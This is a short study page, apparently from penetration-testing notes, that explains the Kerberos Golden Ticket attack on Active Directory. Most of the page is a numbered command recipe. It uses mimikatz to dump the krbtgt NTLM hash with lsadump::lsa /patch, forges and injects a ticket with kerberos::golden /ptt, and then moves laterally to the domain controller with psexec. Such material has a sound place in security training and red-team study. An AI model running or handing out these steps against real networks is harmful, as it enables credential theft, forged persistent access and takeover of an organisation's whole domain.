Previous

Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a
request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the
domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we could create our own self-made
custom TGTs, or golden tickets

  1. mimikatz.exe
  1. privilege::debug
  1. lsadump::lsa /patch

    to get krbtgt ntlm hash
  1. kerberos::purge
  1. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt
  1. misc::cmd
  1. psexec.exe \\<dc_machine> cmd.exe

    With the golden ticket injected into memory, we can launch a new command prompt with
    misc::cmd and again attempt lateral movement with PsExec
  1. whoami
  1. whoami /group for verification